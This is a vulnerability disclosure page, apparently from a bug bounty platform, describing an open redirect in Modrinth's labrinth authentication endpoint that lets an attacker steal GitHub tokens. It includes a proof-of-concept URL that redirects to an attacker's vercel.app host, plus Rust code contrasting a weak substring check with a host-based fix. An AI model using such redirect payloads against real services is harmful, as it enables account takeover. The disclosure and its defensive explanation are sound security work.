Account Takeover in modrinth/labrinth

Valid

Reported on

Oct 15th 2022


Description

A malicious actor can set up a website on vercel.app with the vercel.app domain; after that, they can change the subdomain to something containing modrinth. This will allow an open redirect on https://api.modrinth.com/v2/auth/init?url=ATTACKER_URL, allowing stealing the GitHub token, which allows full account takeover.

Proof of Concept

https://api.modrinth.com/v2/auth/init?url=https://test-modrinth.vercel.app/api/hello

Impact

This vulnerability is capable of full account takeover. The user can reset the token of their account, but the attacker will have access to the user's account until then.
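The root cause the report describes (a redirect target is accepted when its URL merely contains the string "modrinth") contrasted with a host-based check, as an added illustration. This is not labrinth's code or its fix; the page does not show the original check or what commit 07edb9 changed, so the weak check below is an assumption based on the description, and the std-only host extraction stands in for a real URL parser.

```rust
/// Extract the lowercase host from an absolute http(s) URL, or None if the
/// input is not one. std-only for illustration; production code should use a
/// full URL parser (IPv6 literals, percent-encoding etc. are not handled here).
fn host_of(raw: &str) -> Option<String> {
    let rest = raw
        .strip_prefix("https://")
        .or_else(|| raw.strip_prefix("http://"))?;
    // The authority ends at the first '/', '?' or '#'.
    let end = rest
        .find(|c: char| c == '/' || c == '?' || c == '#')
        .unwrap_or(rest.len());
    let authority = &rest[..end];
    // Drop any userinfo ("user:pass@") so "modrinth.com@evil.example" is not
    // mistaken for modrinth.com, then drop the port.
    let hostport = authority.rsplit('@').next()?;
    let host = hostport.split(':').next()?;
    if host.is_empty() {
        return None;
    }
    Some(host.to_ascii_lowercase())
}

/// Assumed weak check matching the report: any URL containing "modrinth"
/// anywhere in its text is accepted, so "test-modrinth.vercel.app" passes.
fn allowed_by_substring(url: &str) -> bool {
    url.contains("modrinth")
}

/// Hardened check: require https, parse the host, and accept only the
/// first-party domain itself or one of its subdomains (note the leading dot).
fn allowed_by_host(url: &str) -> bool {
    if !url.starts_with("https://") {
        return false;
    }
    match host_of(url) {
        Some(h) => h == "modrinth.com" || h.ends_with(".modrinth.com"),
        None => false,
    }
}

fn main() {
    // The report's proof-of-concept URL, evaluated by both checks.
    let poc = "https://test-modrinth.vercel.app/api/hello";
    println!("substring check accepts PoC: {}", allowed_by_substring(poc));
    println!("host check accepts PoC:      {}", allowed_by_host(poc));
}
```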

We are processing your report and will contact the modrinth/labrinth team within 24 hours. 2 months ago
modrinth/labrinth maintainer has acknowledged this report 2 months ago
wafflecoffee validated this vulnerability 2 months ago
ZeoNight has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
wafflecoffee marked this as fixed in Not applicable with commit 07edb9 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
wafflecoffee published this vulnerability 2 months ago